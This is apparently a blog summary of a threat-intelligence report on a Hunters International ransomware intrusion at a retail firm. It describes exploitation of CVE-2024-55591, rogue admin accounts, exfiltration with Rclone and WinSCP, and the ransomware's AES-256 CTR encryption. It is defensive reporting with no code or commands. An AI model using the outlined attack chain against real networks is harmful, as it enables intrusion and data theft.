In February 2025, the eSentire Threat Response Unit (TRU) uncovered a ransomware operation targeting a retail organization. This attack was attributed to Hunters International, a group that surfaced in mid-2023. The group reportedly acquired ransomware source code from Hive, operating independently with their own infrastructure.

Initial Access and Exploitation

The attackers gained entry by exploiting CVE-2024-55591, a vulnerability in FortiOS and FortiProxy. This authentication bypass allowed them to infiltrate the network via a VPN, using RDP for deeper access. They executed reconnaissance commands, created user accounts, and attempted data exfiltration using Rclone before switching to WinSCP.

Exploitation Details

The exploitation of CVE-2024-55591 was evident in the jsconsole logs, where a new user "my_admin" was created. This account was used to establish a super admin account and to add a firewall policy, granting extensive access to internal resources. The attackers then accessed a domain controller and executed typical reconnaissance commands.

  • Key Point 1: Attackers exploited CVE-2024-55591 to gain initial access.
  • Key Point 2: They used RDP and VPN for further network infiltration.

Data Exfiltration and Ransomware Deployment

Hunters International used Rclone and WinSCP for data exfiltration. They initially attempted to exfiltrate data using Rclone, specifying arguments to ignore older files and limit bandwidth. After some failures, they pivoted to WinSCP, downloading it from the official site and using PowerShell scripts to automate the process.

Ransomware Execution

The group attempted to deploy the "encrypter_windows_x64.exe" ransomware, which was detected and quarantined. They then switched to a DLL version, "encrypter_windows_x64.dll". This ransomware, written in Rust, does not leave ransom notes or append extensions to encrypted files.

  • Key Point 1: Rclone and WinSCP were used for data exfiltration.
  • Key Point 2: The ransomware was deployed using a DLL version after initial detection.

Technical Analysis of Ransomware

The ransomware employs AES-256 CTR encryption, using multiple threads to encrypt files. It generates a buffer with a 32-byte key and a 16-byte initial counter for encryption. The ransomware also uses Service Control Manager APIs to stop services and terminate processes specified in command line arguments.

Encryption Process

The encryption process involves XORing plaintext with a keystream generated from the AES-256 CTR algorithm. The ransomware skips certain directories, files, and file extensions during encryption to ensure system stability.

  • Key Point 1: AES-256 CTR is used for file encryption.
  • Key Point 2: Specific directories and files are excluded from encryption.
The link has been copied!